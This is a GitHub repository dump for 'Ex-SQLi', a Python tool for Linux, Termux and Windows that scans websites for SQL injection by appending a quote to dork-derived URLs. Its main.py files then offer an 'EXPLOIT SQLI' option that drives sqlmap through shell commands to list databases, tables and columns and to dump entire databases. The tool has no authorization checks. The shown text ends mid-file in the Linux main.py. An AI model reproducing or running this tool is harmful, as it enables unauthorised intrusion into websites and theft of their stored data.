├── Ex-SQLi-Linux ├── pyarmor_runtime_000000 │ ├── __init__.py │ ├── pyarmor_runtime.pyd │ └── __pycache__ │ │ └── __init__.cpython-311.pyc ├── README.md ├── main.py └── dork.txt ├── Ex-SQLi-Termux ├── pyarmor_runtime_000000 │ ├── __init__.py │ ├── pyarmor_runtime.pyd │ └── __pycache__ │ │ └── __init__.cpython-311.pyc ├── README.md ├── main.py └── dork.txt ├── Ex-SQLi-Windows ├── pyarmor_runtime_000000 │ ├── __init__.py │ ├── pyarmor_runtime.pyd │ ├── __pycache__ │ │ └── __init__.cpython-311.pyc │ └── README.md ├── setup.py ├── main.py └── dork.txt └── README.md /Ex-SQLi-Linux/pyarmor_runtime_000000/__init__.py: -------------------------------------------------------------------------------- 1 | # Pyarmor 8.5.9 (trial), 000000, 2024-06-29T20:45:50.732097 2 | from .pyarmor_runtime import __pyarmor__ 3 | -------------------------------------------------------------------------------- /Ex-SQLi-Linux/pyarmor_runtime_000000/pyarmor_runtime.pyd: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0-d3y/Ex-SQLi/HEAD/Ex-SQLi-Linux/pyarmor_runtime_000000/pyarmor_runtime.pyd -------------------------------------------------------------------------------- /Ex-SQLi-Termux/pyarmor_runtime_000000/__init__.py: -------------------------------------------------------------------------------- 1 | # Pyarmor 8.5.9 (trial), 000000, 2024-07-01T19:27:52.866104 2 | from .pyarmor_runtime import __pyarmor__ 3 | -------------------------------------------------------------------------------- /Ex-SQLi-Termux/pyarmor_runtime_000000/pyarmor_runtime.pyd: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0-d3y/Ex-SQLi/HEAD/Ex-SQLi-Termux/pyarmor_runtime_000000/pyarmor_runtime.pyd -------------------------------------------------------------------------------- /Ex-SQLi-Windows/pyarmor_runtime_000000/__init__.py: -------------------------------------------------------------------------------- 1 | # Pyarmor 8.5.9 (trial), 000000, 2024-07-01T21:06:17.434198 2 | from .pyarmor_runtime import __pyarmor__ 3 | -------------------------------------------------------------------------------- /Ex-SQLi-Windows/pyarmor_runtime_000000/pyarmor_runtime.pyd: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0-d3y/Ex-SQLi/HEAD/Ex-SQLi-Windows/pyarmor_runtime_000000/pyarmor_runtime.pyd -------------------------------------------------------------------------------- /Ex-SQLi-Linux/pyarmor_runtime_000000/__pycache__/__init__.cpython-311.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0-d3y/Ex-SQLi/HEAD/Ex-SQLi-Linux/pyarmor_runtime_000000/__pycache__/__init__.cpython-311.pyc -------------------------------------------------------------------------------- /Ex-SQLi-Termux/pyarmor_runtime_000000/__pycache__/__init__.cpython-311.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0-d3y/Ex-SQLi/HEAD/Ex-SQLi-Termux/pyarmor_runtime_000000/__pycache__/__init__.cpython-311.pyc -------------------------------------------------------------------------------- /Ex-SQLi-Windows/pyarmor_runtime_000000/__pycache__/__init__.cpython-311.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0-d3y/Ex-SQLi/HEAD/Ex-SQLi-Windows/pyarmor_runtime_000000/__pycache__/__init__.cpython-311.pyc -------------------------------------------------------------------------------- /Ex-SQLi-Windows/setup.py: -------------------------------------------------------------------------------- 1 | import os 2 | os.system("pip install pyarmor") 3 | os.system("pip install aiohttp pyfiglet") 4 | os.system("python -m pip install --upgrade pip") 5 | os.system("curl -L -o sqlmap.zip https://github.com/sqlmapproject/sqlmap/zipball/master") 6 | os.system("Expand-Archive -Path .\sqlmap.zip -DestinationPath .\sqlmap") 7 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | 2 | ![logo](https://raw.githubusercontent.com/mr-sami-x/SQLi/main/Picsart_23-07-21_02-11-16-006.png) 3 | 4 | # EX - SQLi 5 | 6 | [![License](https://img.shields.io/badge/license-MIT-blue.svg)](https://opensource.org/licenses/MIT) 7 | [![Python](https://img.shields.io/badge/python-3.6%2B-blue.svg)](https://www.python.org/downloads/release) 8 | [![GitHub issues](https://img.shields.io/github/issues/0-d3y/Ex-SQLi)](https://github.com/0-d3y/Ex-SQLi/issues) 9 | [![GitHub stars](https://img.shields.io/github/stars/0-d3y/Ex-SQLi)](https://github.com/0-d3y/Ex-SQLi/stargazers) 10 | 11 | 12 | ## Overview 13 | EX - SQLi is an advanced tool for scanning and detecting SQL Injection vulnerabilities in websites. The tool provides fast and efficient scanning using modern techniques and features. It supports batch processing of multiple URLs and excels in accurately detecting vulnerabilities using common SQL error patterns. 14 | 15 | 16 | ## Features 17 | Fast Scanning: Utilizes asynchronous requests to speed up the scanning process. 18 | High Accuracy: Detects SQL Injection vulnerabilities using common SQL error patterns. 19 | Batch Support: Capable of scanning multiple URLs at once. 20 | User-Friendly Interface: Simple interface with detailed logging of operations. 21 | 22 | 23 | ## Downloading to the Systems 24 | 25 | ### Kali Linux 26 | [Download for Kali Linux](https://github.com/0-d3y/Ex-SQLi/tree/main/Ex-SQLi-Linux) 27 | 28 | ### Windows 29 | [Download for Windows](https://github.com/0-d3y/Ex-SQLi/tree/main/Ex-SQLi-Windows) 30 | 31 | ### Termux 32 | [Download for Termux](https://github.com/0-d3y/Ex-SQLi/tree/main/Ex-SQLi-Termux) 33 | 34 | 35 | ## Follow me on social media: 36 | 37 | [![Twitter](https://img.shields.io/badge/Twitter-1DA1F2?style=for-the-badge&logo=twitter&logoColor=white)](https://twitter.com/Linux_ye) 38 | [![Instagram](https://img.shields.io/badge/Instagram-E4405F?style=for-the-badge&logo=instagram&logoColor=white)](https://www.instagram.com/cyber_77k) 39 | [![YouTube](https://img.shields.io/badge/YouTube-FF0000?style=for-the-badge&logo=youtube&logoColor=white)](https://www.youtube.com/@0.d3y) 40 | [![Telegram](https://img.shields.io/badge/Telegram-2CA5E0?style=for-the-badge&logo=telegram&logoColor=white)](https://t.me/i_0d3y) 41 | -------------------------------------------------------------------------------- /Ex-SQLi-Windows/pyarmor_runtime_000000/README.md: -------------------------------------------------------------------------------- 1 | 2 | ![logo](https://raw.githubusercontent.com/mr-sami-x/SQLi/main/Picsart_23-07-21_02-11-16-006.png) 3 | 4 | # EX - SQLi Windows 5 | 6 | [![License](https://img.shields.io/badge/license-MIT-blue.svg)](https://opensource.org/licenses/MIT) 7 | [![Python](https://img.shields.io/badge/python-3.6%2B-blue.svg)](https://www.python.org/downloads/release) 8 | [![GitHub issues](https://img.shields.io/github/issues/0-d3y/Ex-SQLi)](https://github.com/0-d3y/Ex-SQLi/issues) 9 | [![GitHub stars](https://img.shields.io/github/stars/0-d3y/Ex-SQLi)](https://github.com/0-d3y/Ex-SQLi/stargazers) 10 | 11 | 12 | ## Overview 13 | EX - SQLi is an advanced tool for scanning and detecting SQL Injection vulnerabilities in websites. The tool provides fast and efficient scanning using modern techniques and features. It supports batch processing of multiple URLs and excels in accurately detecting vulnerabilities using common SQL error patterns. 14 | 15 | 16 | ## Features 17 | Fast Scanning: Utilizes asynchronous requests to speed up the scanning process. 18 | High Accuracy: Detects SQL Injection vulnerabilities using common SQL error patterns. 19 | Batch Support: Capable of scanning multiple URLs at once. 20 | User-Friendly Interface: Simple interface with detailed logging of operations. 21 | 22 | 23 | ## Usage Commands 24 | ### Running the Tool 25 | To run the tool, you can use the following commands from the command line: 26 | 27 | ``` 28 | python setup.py 29 | python main.py 30 | ``` 31 | 32 | ## You will see the following menu for selection: 33 | ``` 34 | [1] EXPLOIT SQLI 35 | 36 | [2] SCANNING SQL INJECTION 37 | 38 | [3] ABOUT DEVELOPER 39 | 40 | [4] ABOUT SOFTWARE 41 | ``` 42 | 43 | 44 | ## SQL Injection Scanning 45 | To start scanning for SQL Injection vulnerabilities: 46 | 47 | 48 | Choose the option [2] SCANNING SQL INJECTION. 49 | Enter the URL to scan. 50 | Exploiting SQL Injection Vulnerabilities 51 | To exploit detected SQL Injection vulnerabilities: 52 | 53 | Choose the option [1] EXPLOIT SQLI. 54 | Enter the URL to scan. 55 | Follow the instructions to input the database name, tables, and columns. 56 | Viewing Developer Information 57 | To view information about the developer: 58 | 59 | Choose the option [3] ABOUT DEVELOPER. 60 | Viewing Software Information 61 | To view information about the software: 62 | 63 | Choose the option [4] ABOUT SOFTWARE. 64 | ## Developer 65 | Name : SaMi 66 | From : Yemen 67 | 68 | Telegram: https://t.me/i_0d3y 69 | 70 | GitHub: https://github.com/0-d3y 71 | 72 | Website: https://sami-soft-ye.blogspot.com 73 | 74 | 75 | ## Resource Downloads 76 | 77 | ### Downloading sqlmap 78 | The tool requires sqlmap for exploitation operations. To download sqlmap, follow these steps: 79 | 80 | 81 | Download sqlmap from the official link. 82 | Extract the file and place it in an accessible directory. 83 | Update the path in the code to match the sqlmap path on your system: 84 | sqlmap_path = "path/to/sqlmap.py" 85 | 86 | 87 | 88 | ## Follow me on social media: 89 | 90 | [![Twitter](https://img.shields.io/badge/Twitter-1DA1F2?style=for-the-badge&logo=twitter&logoColor=white)](https://twitter.com/Linux_ye) 91 | [![Instagram](https://img.shields.io/badge/Instagram-E4405F?style=for-the-badge&logo=instagram&logoColor=white)](https://www.instagram.com/cyber_77k) 92 | [![YouTube](https://img.shields.io/badge/YouTube-FF0000?style=for-the-badge&logo=youtube&logoColor=white)](https://www.youtube.com/0.d3y) 93 | [![Telegram](https://img.shields.io/badge/Telegram-2CA5E0?style=for-the-badge&logo=telegram&logoColor=white)](https://t.me/i_0d3y) 94 | -------------------------------------------------------------------------------- /Ex-SQLi-Linux/README.md: -------------------------------------------------------------------------------- 1 | 2 | ![logo](https://raw.githubusercontent.com/mr-sami-x/SQLi/main/Picsart_23-07-21_02-11-16-006.png) 3 | 4 | # EX - SQLi Linux 5 | 6 | [![License](https://img.shields.io/badge/license-MIT-blue.svg)](https://opensource.org/licenses/MIT) 7 | [![Python](https://img.shields.io/badge/python-3.6%2B-blue.svg)](https://www.python.org/downloads/release) 8 | [![GitHub issues](https://img.shields.io/github/issues/0-d3y/Ex-SQLi)](https://github.com/0-d3y/Ex-SQLi/issues) 9 | [![GitHub stars](https://img.shields.io/github/stars/0-d3y/Ex-SQLi)](https://github.com/0-d3y/Ex-SQLi/stargazers) 10 | 11 | 12 | ## Overview 13 | EX - SQLi is an advanced tool for scanning and detecting SQL Injection vulnerabilities in websites. The tool provides fast and efficient scanning using modern techniques and features. It supports batch processing of multiple URLs and excels in accurately detecting vulnerabilities using common SQL error patterns. 14 | 15 | 16 | ## Features 17 | Fast Scanning: Utilizes asynchronous requests to speed up the scanning process. 18 | High Accuracy: Detects SQL Injection vulnerabilities using common SQL error patterns. 19 | Batch Support: Capable of scanning multiple URLs at once. 20 | User-Friendly Interface: Simple interface with detailed logging of operations. 21 | 22 | 23 | ## Usage Commands 24 | ### Running the Tool 25 | To run the tool, you can use the following commands from the command line: 26 | 27 | ``` 28 | python main.py 29 | ``` 30 | 31 | ## You will see the following menu for selection: 32 | ``` 33 | [1] EXPLOIT SQLI 34 | 35 | [2] SCANNING SQL INJECTION 36 | 37 | [3] ABOUT DEVELOPER 38 | 39 | [4] ABOUT SOFTWARE 40 | ``` 41 | 42 | 43 | ## SQL Injection Scanning 44 | To start scanning for SQL Injection vulnerabilities: 45 | 46 | 47 | Choose the option [2] SCANNING SQL INJECTION. 48 | Enter the URL to scan. 49 | Exploiting SQL Injection Vulnerabilities 50 | To exploit detected SQL Injection vulnerabilities: 51 | 52 | Choose the option [1] EXPLOIT SQLI. 53 | Enter the URL to scan. 54 | Follow the instructions to input the database name, tables, and columns. 55 | Viewing Developer Information 56 | To view information about the developer: 57 | 58 | Choose the option [3] ABOUT DEVELOPER. 59 | Viewing Software Information 60 | To view information about the software: 61 | 62 | Choose the option [4] ABOUT SOFTWARE. 63 | ## Developer 64 | Name : SaMi 65 | From : Yemen 66 | 67 | Telegram: https://t.me/i_0d3y 68 | 69 | GitHub: https://github.com/0-d3y 70 | 71 | Website: https://sami-soft-ye.blogspot.com 72 | 73 | 74 | ## Resource Downloads 75 | 76 | ### Downloading sqlmap 77 | The tool requires sqlmap for exploitation operations. To download sqlmap, follow these steps: 78 | 79 | 80 | Download sqlmap from the official link. 81 | Extract the file and place it in an accessible directory. 82 | Update the path in the code to match the sqlmap path on your system: 83 | sqlmap_path = "path/to/sqlmap.py" 84 | 85 | 86 | ## Installing Required Libraries 87 | Make sure to install the required libraries using pip: 88 | ``` 89 | pip install pyarmor 90 | pip install aiohttp pyfiglet 91 | ``` 92 | 93 | ## Follow me on social media: 94 | 95 | [![Twitter](https://img.shields.io/badge/Twitter-1DA1F2?style=for-the-badge&logo=twitter&logoColor=white)](https://twitter.com/Linux_ye) 96 | [![Instagram](https://img.shields.io/badge/Instagram-E4405F?style=for-the-badge&logo=instagram&logoColor=white)](https://www.instagram.com/cyber_77k) 97 | [![YouTube](https://img.shields.io/badge/YouTube-FF0000?style=for-the-badge&logo=youtube&logoColor=white)](https://www.youtube.com/0.d3y) 98 | [![Telegram](https://img.shields.io/badge/Telegram-2CA5E0?style=for-the-badge&logo=telegram&logoColor=white)](https://t.me/i_0d3y) 99 | -------------------------------------------------------------------------------- /Ex-SQLi-Termux/README.md: -------------------------------------------------------------------------------- 1 | 2 | ![logo](https://raw.githubusercontent.com/mr-sami-x/SQLi/main/Picsart_23-07-21_02-11-16-006.png) 3 | 4 | # EX - SQLi Termux 5 | 6 | [![License](https://img.shields.io/badge/license-MIT-blue.svg)](https://opensource.org/licenses/MIT) 7 | [![Python](https://img.shields.io/badge/python-3.6%2B-blue.svg)](https://www.python.org/downloads/release) 8 | [![GitHub issues](https://img.shields.io/github/issues/0-d3y/Ex-SQLi)](https://github.com/0-d3y/Ex-SQLi/issues) 9 | [![GitHub stars](https://img.shields.io/github/stars/0-d3y/Ex-SQLi)](https://github.com/0-d3y/Ex-SQLi/stargazers) 10 | 11 | 12 | ## Overview 13 | EX - SQLi is an advanced tool for scanning and detecting SQL Injection vulnerabilities in websites. The tool provides fast and efficient scanning using modern techniques and features. It supports batch processing of multiple URLs and excels in accurately detecting vulnerabilities using common SQL error patterns. 14 | 15 | 16 | ## Features 17 | Fast Scanning: Utilizes asynchronous requests to speed up the scanning process. 18 | High Accuracy: Detects SQL Injection vulnerabilities using common SQL error patterns. 19 | Batch Support: Capable of scanning multiple URLs at once. 20 | User-Friendly Interface: Simple interface with detailed logging of operations. 21 | 22 | 23 | ## Usage Commands 24 | ### Running the Tool 25 | To run the tool, you can use the following commands from the command line: 26 | 27 | ``` 28 | python main.py 29 | ``` 30 | 31 | ## You will see the following menu for selection: 32 | ``` 33 | [1] EXPLOIT SQLI 34 | 35 | [2] SCANNING SQL INJECTION 36 | 37 | [3] ABOUT DEVELOPER 38 | 39 | [4] ABOUT SOFTWARE 40 | ``` 41 | 42 | 43 | ## SQL Injection Scanning 44 | To start scanning for SQL Injection vulnerabilities: 45 | 46 | 47 | Choose the option [2] SCANNING SQL INJECTION. 48 | Enter the URL to scan. 49 | Exploiting SQL Injection Vulnerabilities 50 | To exploit detected SQL Injection vulnerabilities: 51 | 52 | Choose the option [1] EXPLOIT SQLI. 53 | Enter the URL to scan. 54 | Follow the instructions to input the database name, tables, and columns. 55 | Viewing Developer Information 56 | To view information about the developer: 57 | 58 | Choose the option [3] ABOUT DEVELOPER. 59 | Viewing Software Information 60 | To view information about the software: 61 | 62 | Choose the option [4] ABOUT SOFTWARE. 63 | ## Developer 64 | Name : SaMi 65 | From : Yemen 66 | 67 | Telegram: https://t.me/i_0d3y 68 | 69 | GitHub: https://github.com/0-d3y 70 | 71 | Website: https://sami-soft-ye.blogspot.com 72 | 73 | 74 | ## Resource Downloads 75 | 76 | ### Downloading sqlmap 77 | The tool requires sqlmap for exploitation operations. To download sqlmap, follow these steps: 78 | 79 | 80 | Download sqlmap from the official link. 81 | Extract the file and place it in an accessible directory. 82 | Update the path in the code to match the sqlmap path on your system: 83 | sqlmap_path = "path/to/sqlmap.py" 84 | 85 | 86 | ## Installing Required Libraries 87 | Make sure to install the required libraries using pip: 88 | ``` 89 | pkg update && pkg upgrade 90 | pkg install python git 91 | pip install aiohttp pyfiglet 92 | pip install pyarmor 93 | pkg install sqlmap 94 | ``` 95 | 96 | ## Follow me on social media: 97 | 98 | [![Twitter](https://img.shields.io/badge/Twitter-1DA1F2?style=for-the-badge&logo=twitter&logoColor=white)](https://twitter.com/Linux_ye) 99 | [![Instagram](https://img.shields.io/badge/Instagram-E4405F?style=for-the-badge&logo=instagram&logoColor=white)](https://www.instagram.com/cyber_77k) 100 | [![YouTube](https://img.shields.io/badge/YouTube-FF0000?style=for-the-badge&logo=youtube&logoColor=white)](https://www.youtube.com/0.d3y) 101 | [![Telegram](https://img.shields.io/badge/Telegram-2CA5E0?style=for-the-badge&logo=telegram&logoColor=white)](https://t.me/i_0d3y) 102 | -------------------------------------------------------------------------------- /Ex-SQLi-Termux/main.py: -------------------------------------------------------------------------------- 1 | import os 2 | import aiohttp 3 | import asyncio 4 | import re 5 | import platform 6 | import webbrowser 7 | from pyfiglet import Figlet 8 | import subprocess 9 | import sys 10 | 11 | 12 | GREEN = "\033[92m" 13 | RED = "\033[91m" 14 | YELLOW = "\033[93m" 15 | CYAN = "\033[96m" 16 | RESET = "\033[0m" 17 | 18 | uname = [] 19 | payload = "'" 20 | num_id = range(1, 100) 21 | 22 | def load_dorks(filename="dork.txt"): 23 | try: 24 | with open(filename, 'r', encoding='utf-8') as file: 25 | return file.read().splitlines() 26 | except FileNotFoundError: 27 | print(f"File {filename} not found.") 28 | return [] 29 | 30 | page = load_dorks() 31 | 32 | def check_site(site): 33 | if not site.startswith("http"): 34 | site = f"http://{site}" 35 | return site 36 | 37 | async def scan_page(session, site, pg, ids): 38 | site_sql = f"{site}/{pg}{ids}{payload}" 39 | try: 40 | async with session.get(site_sql) as response: 41 | sqli_injection = f"{site}/{pg}{ids}" 42 | source_code = await response.text() 43 | if re.search(r'You have an error in your SQL syntax;', source_code): 44 | status = f"-| \033[1;32mSQL INJECTION : {sqli_injection}" 45 | sys.stdout.write("\r" + status) 46 | sys.stdout.flush() 47 | with open('sites_sql.txt', 'a', encoding='utf-8') as site_file: 48 | site_file.write(f"{sqli_injection}\n") 49 | exploits = input(f"\n{RESET}#{RED} Do you want to exploit it now? :{RESET} ") 50 | if exploits.lower() in ['yes', 'y']: 51 | await exploit(sqli_injection) 52 | 53 | else: 54 | status = f"{RESET}-| {GREEN} Scanning :{RESET} {site} {RED}~ {RESET}[ {GREEN}ID: {ids} ~ {page.index(pg) + 1}/{len(page)}{RESET} ]" 55 | sys.stdout.write("\r" + status) 56 | sys.stdout.flush() 57 | except Exception as e: 58 | pass 59 | 60 | async def scanning(site): 61 | site = check_site(site) 62 | async with aiohttp.ClientSession() as session: 63 | tasks = [] 64 | for pg in page: 65 | for ids in num_id: 66 | task = asyncio.create_task(scan_page(session, site, pg, ids)) 67 | tasks.append(task) 68 | await asyncio.gather(*tasks) 69 | 70 | async def exploit(site): 71 | site = check_site(site) 72 | for pg in page: 73 | for ids in num_id: 74 | sqlmap_cmd = f"python sqlmap.py -u {site}/{pg}{ids} --dbs --batch" 75 | subprocess.run(sqlmap_cmd, shell=True) 76 | db = input("\033[90m╔═══[Enter Database Name ]\n╚══>>> \033[32m") 77 | sqlmap_cmd = f"python sqlmap.py -u {site}/{pg}{ids} -D {db} --tables" 78 | subprocess.run(sqlmap_cmd, shell=True) 79 | table = input("\033[90m╔═══[Enter Table Name ]\n╚══>>> \033[32m") 80 | sqlmap_cmd = f"python sqlmap.py -u {site}/{pg}{ids} -D {db} -T {table} --columns" 81 | subprocess.run(sqlmap_cmd, shell=True) 82 | dn = input("\033[1;31mDo you want to load the table or slot to load the table, type [d]: ") 83 | if dn.lower() == "d": 84 | col = input("\033[1;31m[+] Write to me the name of the column you want to download: ") 85 | sqlmap_cmd = f"python sqlmap.py -u {site}/{pg}{ids} -D {db} -T {table} -C {col} --dump" 86 | subprocess.run(sqlmap_cmd, shell=True) 87 | else: 88 | d_all = input("\033[1;31mDo you want to download the entire database [y/n]: ") 89 | if d_all.lower() == "y": 90 | sqlmap_cmd = f"python sqlmap.py -u {site}/{pg}{ids} -D {db} --dump" 91 | subprocess.run(sqlmap_cmd, shell=True) 92 | 93 | def main(): 94 | try: 95 | if platform.system() == "Linux": 96 | os.system('clear') 97 | else: 98 | os.system('cls') 99 | 100 | f = Figlet(font='slant') 101 | print(RED + f.renderText('EX - SQLi')) 102 | print(RESET+ " Coded By inst: cyber_77k\n\n") 103 | print(f""" 104 | 105 | {RED}[{RESET}1{RED}] {GREEN}EXPLOIT SQLI {RED}[{RESET}2{RED}] {GREEN} SCANNING SQLi 106 | {RED}[{RESET}3{RED}] {GREEN}ABOUT DEVELOPER {RED}[{RESET}4{RED}] {GREEN} ABOUT SOFTWARE 107 | """) 108 | sqli = input(f"\n{RED}╔═══{GREEN}[ {RESET}root{GREEN}@{RESET}Ex-SQLi ~ V0.1 {GREEN}] \n{RED}╚══>>> \033[32m") 109 | 110 | if sqli == '1': 111 | site = input(f"\n{RED}╔═══{GREEN}[ {RESET}ENTER URL{GREEN}] \n{RED}╚══>>> \033[32m") 112 | asyncio.run(exploit(site)) 113 | elif sqli == '2': 114 | site = input(f"\n{RED}╔═══{GREEN}[ {RESET}ENTER URL{GREEN}] \n{RED}╚══>>> \033[32m") 115 | asyncio.run(scanning(site)) 116 | elif sqli == '3': 117 | about_developer() 118 | elif sqli == '4': 119 | about_software() 120 | except Exception as s: 121 | print(f"Error: {s}") 122 | 123 | def about_developer(): 124 | print(f""" 125 | {CYAN}About The Developer{RESET} 126 | {YELLOW}------------------{RESET} 127 | {GREEN}Name:{RESET} Mr.SaMi From Yemen 128 | {GREEN}Telegram:{RESET} https://t.me/SaMi_ye 129 | {GREEN}GitHub:{RESET} https://github.com/0.d3y 130 | {GREEN}Website:{RESET} https://sami-soft-ye.blogspot.com 131 | {YELLOW}------------------{RESET} 132 | """) 133 | input(f"{RED}-| {RESET}Press Enter to return ~{RED}# {GREEN}") 134 | main() 135 | 136 | def about_software(): 137 | print(f""" 138 | {CYAN}About the Software{RESET} 139 | {YELLOW}------------------{RESET} 140 | {GREEN}Name:{RESET} EX - SQLi 141 | {GREEN}Version:{RESET} 1.0 142 | {GREEN}Features:{RESET} 143 | - Fast and efficient SQL Injection scanning 144 | - Supports batch processing of multiple URLs 145 | - High accuracy with detection of common SQL error patterns 146 | - User-friendly interface with detailed logging 147 | 148 | {GREEN}Speed:{RESET} Optimized for high performance with asynchronous requests 149 | {GREEN}Accuracy:{RESET} High accuracy in detecting SQL Injection vulnerabilities using common error patterns 150 | {YELLOW}------------------{RESET} 151 | """) 152 | input(f"{RED}-| {RESET}Press Enter to return ~{RED}# {GREEN}") 153 | main() 154 | 155 | def login(): 156 | try: 157 | with open("ch.txt", 'r', encoding='utf-8') as file: 158 | sami_ch = file.read().splitlines() 159 | if 'ok' in sami_ch: 160 | main() 161 | except FileNotFoundError: 162 | webbrowser.open('https://t.me/i_0d3y') 163 | with open('ch.txt', 'w', encoding='utf-8') as file: 164 | file.write('ok') 165 | main() 166 | 167 | login() 168 | -------------------------------------------------------------------------------- /Ex-SQLi-Windows/main.py: -------------------------------------------------------------------------------- 1 | import os 2 | import aiohttp 3 | import asyncio 4 | import re 5 | import platform 6 | import webbrowser 7 | from pyfiglet import Figlet 8 | import subprocess 9 | import sys 10 | 11 | 12 | GREEN = "\033[92m" 13 | RED = "\033[91m" 14 | YELLOW = "\033[93m" 15 | CYAN = "\033[96m" 16 | RESET = "\033[0m" 17 | 18 | uname = [] 19 | payload = "'" 20 | num_id = range(1, 100) 21 | 22 | def load_dorks(filename="dork.txt"): 23 | try: 24 | with open(filename, 'r', encoding='utf-8') as file: 25 | return file.read().splitlines() 26 | except FileNotFoundError: 27 | print(f"File {filename} not found.") 28 | return [] 29 | 30 | page = load_dorks() 31 | 32 | def check_site(site): 33 | if not site.startswith("http"): 34 | site = f"http://{site}" 35 | return site 36 | 37 | async def scan_page(session, site, pg, ids): 38 | site_sql = f"{site}/{pg}{ids}{payload}" 39 | try: 40 | async with session.get(site_sql) as response: 41 | sqli_injection = f"{site}/{pg}{ids}" 42 | source_code = await response.text() 43 | if re.search(r'You have an error in your SQL syntax;', source_code): 44 | status = f"-| \033[1;32mSQL INJECTION : {sqli_injection}" 45 | sys.stdout.write("\r" + status) 46 | sys.stdout.flush() 47 | with open('sites_sql.txt', 'a', encoding='utf-8') as site_file: 48 | site_file.write(f"{sqli_injection}\n") 49 | exploits = input(f"\n{RESET}#{RED} Do you want to exploit it now? :{RESET} ") 50 | if exploits.lower() in ['yes', 'y']: 51 | await exploit(sqli_injection) 52 | 53 | else: 54 | status = f"{RESET}-| {GREEN} Scanning :{RESET} {site} {RED}~ {RESET}[ {GREEN}ID: {ids} ~ {page.index(pg) + 1}/{len(page)}{RESET} ]" 55 | sys.stdout.write("\r" + status) 56 | sys.stdout.flush() 57 | except Exception as e: 58 | pass 59 | 60 | async def scanning(site): 61 | site = check_site(site) 62 | async with aiohttp.ClientSession() as session: 63 | tasks = [] 64 | for pg in page: 65 | for ids in num_id: 66 | task = asyncio.create_task(scan_page(session, site, pg, ids)) 67 | tasks.append(task) 68 | await asyncio.gather(*tasks) 69 | 70 | async def exploit(site): 71 | site = check_site(site) 72 | sqlmap_path = "sqlmap/sqlmapproject-sqlmap-1.8.6-15-g79aa315/sqlmap.py" 73 | for pg in page: 74 | for ids in num_id: 75 | sqlmap_cmd = f"python {sqlmap_path} -u {site}/{pg}{ids} --dbs --batch" 76 | subprocess.run(sqlmap_cmd, shell=True) 77 | db = input("\033[90m╔═══[Enter Database Name ]\n╚══>>> \033[32m") 78 | sqlmap_cmd = f"python {sqlmap_path} -u {site}/{pg}{ids} -D {db} --tables" 79 | subprocess.run(sqlmap_cmd, shell=True) 80 | table = input("\033[90m╔═══[Enter Table Name ]\n╚══>>> \033[32m") 81 | sqlmap_cmd = f"python {sqlmap_path} -u {site}/{pg}{ids} -D {db} -T {table} --columns" 82 | subprocess.run(sqlmap_cmd, shell=True) 83 | dn = input("\033[1;31mDo you want to load the table or slot to load the table, type [d]: ") 84 | if dn.lower() == "d": 85 | col = input("\033[1;31m[+] Write to me the name of the column you want to download: ") 86 | sqlmap_cmd = f"python {sqlmap_path} -u {site}/{pg}{ids} -D {db} -T {table} -C {col} --dump" 87 | subprocess.run(sqlmap_cmd, shell=True) 88 | else: 89 | d_all = input("\033[1;31mDo you want to download the entire database [y/n]: ") 90 | if d_all.lower() == "y": 91 | sqlmap_cmd = f"python {sqlmap_path} -u {site}/{pg}{ids} -D {db} --dump" 92 | subprocess.run(sqlmap_cmd, shell=True) 93 | 94 | def main(): 95 | try: 96 | if platform.system() == "Linux": 97 | os.system('clear') 98 | else: 99 | os.system('cls') 100 | 101 | f = Figlet(font='slant') 102 | print(RED + f.renderText('EX - SQLi')) 103 | print(RESET+ " Coded By inst: cyber_77k\n\n") 104 | print(f""" 105 | 106 | {RED}[{RESET}1{RED}] {GREEN}EXPLOIT SQLI {RED}[{RESET}2{RED}] {GREEN} SCANNING SQLi 107 | {RED}[{RESET}3{RED}] {GREEN}ABOUT DEVELOPER {RED}[{RESET}4{RED}] {GREEN} ABOUT SOFTWARE 108 | """) 109 | sqli = input(f"\n{RED}╔═══{GREEN}[ {RESET}root{GREEN}@{RESET}Ex-SQLi ~ V0.1 {GREEN}] \n{RED}╚══>>> \033[32m") 110 | 111 | if sqli == '1': 112 | site = input(f"\n{RED}╔═══{GREEN}[ {RESET}ENTER URL{GREEN}] \n{RED}╚══>>> \033[32m") 113 | asyncio.run(exploit(site)) 114 | elif sqli == '2': 115 | site = input(f"\n{RED}╔═══{GREEN}[ {RESET}ENTER URL{GREEN}] \n{RED}╚══>>> \033[32m") 116 | asyncio.run(scanning(site)) 117 | elif sqli == '3': 118 | about_developer() 119 | elif sqli == '4': 120 | about_software() 121 | except Exception as s: 122 | print(f"Error: {s}") 123 | 124 | def about_developer(): 125 | print(f""" 126 | {CYAN}About The Developer{RESET} 127 | {YELLOW}------------------{RESET} 128 | {GREEN}Name:{RESET} Mr.SaMi From Yemen 129 | {GREEN}Telegram:{RESET} https://t.me/SaMi_ye 130 | {GREEN}GitHub:{RESET} https://github.com/0.d3y 131 | {GREEN}Website:{RESET} https://sami-soft-ye.blogspot.com 132 | {YELLOW}------------------{RESET} 133 | """) 134 | input(f"{RED}-| {RESET}Press Enter to return ~{RED}# {GREEN}") 135 | main() 136 | 137 | def about_software(): 138 | print(f""" 139 | {CYAN}About the Software{RESET} 140 | {YELLOW}------------------{RESET} 141 | {GREEN}Name:{RESET} EX - SQLi 142 | {GREEN}Version:{RESET} 1.0 143 | {GREEN}Features:{RESET} 144 | - Fast and efficient SQL Injection scanning 145 | - Supports batch processing of multiple URLs 146 | - High accuracy with detection of common SQL error patterns 147 | - User-friendly interface with detailed logging 148 | 149 | {GREEN}Speed:{RESET} Optimized for high performance with asynchronous requests 150 | {GREEN}Accuracy:{RESET} High accuracy in detecting SQL Injection vulnerabilities using common error patterns 151 | {YELLOW}------------------{RESET} 152 | """) 153 | input(f"{RED}-| {RESET}Press Enter to return ~{RED}# {GREEN}") 154 | main() 155 | 156 | def login(): 157 | try: 158 | with open("ch.txt", 'r', encoding='utf-8') as file: 159 | sami_ch = file.read().splitlines() 160 | if 'ok' in sami_ch: 161 | main() 162 | except FileNotFoundError: 163 | webbrowser.open('https://t.me/i_0d3y') 164 | with open('ch.txt', 'w', encoding='utf-8') as file: 165 | file.write('ok') 166 | main() 167 | 168 | login() 169 | -------------------------------------------------------------------------------- /Ex-SQLi-Linux/main.py: -------------------------------------------------------------------------------- 1 | import os 2 | import aiohttp 3 | import 